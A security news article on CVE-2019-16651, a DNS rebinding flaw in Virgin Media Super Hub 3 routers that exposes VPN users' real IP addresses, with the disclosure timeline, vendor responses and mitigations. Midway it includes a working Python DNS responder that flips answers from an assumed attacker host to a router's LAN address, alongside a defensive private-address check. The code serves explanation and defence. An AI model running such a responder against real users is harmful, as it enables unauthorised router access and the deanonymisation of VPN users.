Disclosure comes two years after privacy-busting flaw was discovered
A zero-day vulnerability in Virgin Media Super Hub 3 routers enables attackers to unmask the true IP addresses of VPN (https://portswigger.net/daily-swig/vpn) users, security researchers have revealed.
Fidus Information Security, a UK pen-testing (https://portswigger.net/daily-swig/pen-testing) consultancy, has published details of the flaw nearly two years after first alerting Virgin Media, a British telco, which referred Fidus to Liberty Global, its parent company.
Fidus’ R&D team said it initially delayed disclosure for 12 months at the vendor’s request, but subsequent attempts to contact Virgin Media and Liberty Global then failed to elicit responses.
However, Virgin Media has told The Daily Swig that it is currently working on a “technical fix” for what it also described as an “edge-case issue, potentially impacting only a very small subset of customers” who use VPNs.
Researchers were able to mount a DNS (https://portswigger.net/daily-swig/dns) rebinding attack that revealed a VPN user’s real IP address “by [the user] simply visiting a [malicious] webpage for a few seconds”, reads a blog post (https://fidusinfosec.com/silently-unmasking-virgin-media-vpn-users-in-seconds-cve-2019-16651/) drafted by Fidus in March but eventually published last week.
DNS rebinding attacks (https://www.tripwire.com/state-of-security/vert/practical-attacks-dns-rebinding/) weaponize a victim’s browser by making it a proxy for attacking private networks: the attacker’s domain first resolves to the attacker’s server, which delivers the page, and then to a private address such as the router’s, so the page’s later requests reach the router while the browser still treats them as same-origin.
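To make the rebinding mechanism concrete, here is a toy authoritative DNS responder that flips its answer after the first lookup. It is an added example written for this page; it is not Fidus’ proof of concept and not code from Virgin Media, Liberty Global or CommScope. Everything in it is assumed: the attacker controls DNS for rebind.example.test, the lure page is served from 203.0.113.10, and the victim’s router listens on 192.168.0.1. Which router page leaked the WAN address in the real attack is not described in the article and is not reproduced here. The `rebinds_to_private` function is a resolver-side guard of the kind dnsmasq offers (`--stop-dns-rebind`), included to show the defensive counterpart.

```python
"""Toy DNS rebinding responder (added example; all names and addresses are assumed)."""
import ipaddress
import socket
import struct
from collections import defaultdict

ATTACKER_IP = "203.0.113.10"  # assumed: host serving the lure page
TARGET_IP = "192.168.0.1"     # assumed: LAN address of the victim's router
FLIP_AFTER = 1                # answers with ATTACKER_IP before flipping to TARGET_IP

PRIVATE_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",  # RFC 1918
    "127.0.0.0/8", "169.254.0.0/16",                  # loopback, link-local
)]


def build_query(txid: int, name: str) -> bytes:
    """Encode an A/IN query so the example runs without a real client."""
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set, one question
    return header + qname + struct.pack("!HH", 1, 1)


def parse_query(packet: bytes):
    """Return (txid, lowercase qname, raw question section) of a single A/IN query."""
    txid, flags, qdcount = struct.unpack("!HHH", packet[:6])
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("expected a query with exactly one question")
    labels, pos = [], 12
    while packet[pos] != 0:
        length = packet[pos]
        labels.append(packet[pos + 1:pos + 1 + length].decode("ascii"))
        pos += 1 + length
    pos += 1  # skip the root label
    if struct.unpack("!HH", packet[pos:pos + 4]) != (1, 1):
        raise ValueError("only A/IN queries are handled")
    return txid, ".".join(labels).lower(), packet[12:pos + 4]


def build_response(txid: int, question: bytes, ip: str, ttl: int) -> bytes:
    """Standard response with one A record; the owner name is a pointer to the question."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR, RD, RA; one answer
    rr = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + socket.inet_aton(ip)
    return header + question + rr


def answered_ip(response: bytes) -> str:
    """Read the A record back out of a response built by build_response."""
    return socket.inet_ntoa(response[-4:])


class RebindingResolver:
    """First answer: the attacker's host, so the browser loads the lure page.
    Later answers: the router's LAN address. TTL 0 discourages caching, and the
    origin (scheme, host, port) never changes, so the page's later fetches go to
    the router without any same-origin-policy violation."""

    def __init__(self):
        self.seen = defaultdict(int)

    def answer(self, packet: bytes) -> bytes:
        txid, qname, question = parse_query(packet)
        self.seen[qname] += 1
        ip = ATTACKER_IP if self.seen[qname] <= FLIP_AFTER else TARGET_IP
        return build_response(txid, question, ip, ttl=0)


def rebinds_to_private(response: bytes) -> bool:
    """Resolver-side guard: an answer from an external name server that points
    at private or loopback space is the signature of a rebinding attempt."""
    addr = ipaddress.ip_address(answered_ip(response))
    return any(addr in net for net in PRIVATE_NETS)


def serve(bind: str = "127.0.0.1", port: int = 5353) -> None:
    """Run the responder on UDP (e.g. dig @127.0.0.1 -p 5353 rebind.example.test)."""
    resolver = RebindingResolver()
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.bind((bind, port))
        while True:
            data, peer = sock.recvfrom(512)
            try:
                sock.sendto(resolver.answer(data), peer)
            except ValueError:
                pass  # ignore anything that is not a plain A query


if __name__ == "__main__":
    serve()
```

The second answer is what the article’s mitigations cut off: a VPN client that blocks LAN traffic drops the page’s follow-up request to 192.168.0.1, and a resolver that applies the `rebinds_to_private` check never hands that address to the browser in the first place.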
Privacy implications
The researchers successfully de-anonymized devices whose IP addresses were masked by most “market leading VPNs”, Fidus’ R&D team told The Daily Swig.
However, some VPN providers repelled the attack by blocking access to local IP addresses by default.
“Some blocked the attack by ‘accident’ by preventing LAN traffic but when this was turned off, as many people do, they instantly became vulnerable,” said Fidus.
“The privacy implications are quite severe in this scenario due to the silent nature of the vulnerability,” said Fidus. “In theory, it could be utilised on any popular (likely compromised) webpage and be used to unmask users who are browsing using a VPN.
“Other, more unlikely, scenarios are nation-state (https://portswigger.net/daily-swig/cyber-warfare) or law-enforcement capable bodies using this to unmask not only criminals but also those utilising a VPN solution for their own safety.”
However, a Virgin Media spokesperson said that “a very specific set of circumstances would need to be in place for a customer to be impacted, meaning that the risk to them is very low.”
Hardware supply chain
The researchers tested the exploit against the ARRIS TG2492 (https://www.commscope.com/product-type/broadband-video-devices/broadband-devices/docsis-3.0-gateways-modems/tg2492), but Fidus believes the vulnerability probably affects all related models.
Liberty Global has deployed the ARRIS series of DOCSIS 3.0 cable gateways through multiple internet service providers that it owns worldwide, said Fidus.
The ARRIS brand is actually owned by network (https://portswigger.net/daily-swig/network-security) infrastructure provider CommScope, but Fidus believes Liberty Global owns the firmware.
“They were really vague with all the information which really didn’t help us in any shape or form,” said Fidus. “We did request information for who else to pass it to and that was never given to us.”
Timeline
Liberty Global was first alerted to the vulnerability (https://portswigger.net/daily-swig/vulnerabilities) (CVE-2019-16651) on October 20, 2019.
On February 21, 2020, the company requested a year-long delay to public disclosure – which Fidus agreed to.
However, three subsequent requests for updates that Fidus sent to Liberty Global – on December 9 and 21, 2020, then March 15, 2021 – went unanswered.
Although Virgin Media has yet to complete remediation, the company said: “We have strong security measures in place to protect our network and keep our customers secure. We are not aware of any customers being affected by this issue and they do not need to take any action.”
However, Fidus advises users to “firewall traffic to the router (which obviously isn’t overly user friendly) or ensure LAN traffic on a VPN is blocked” if they want to protect themselves.
SOURCE: The Daily Swig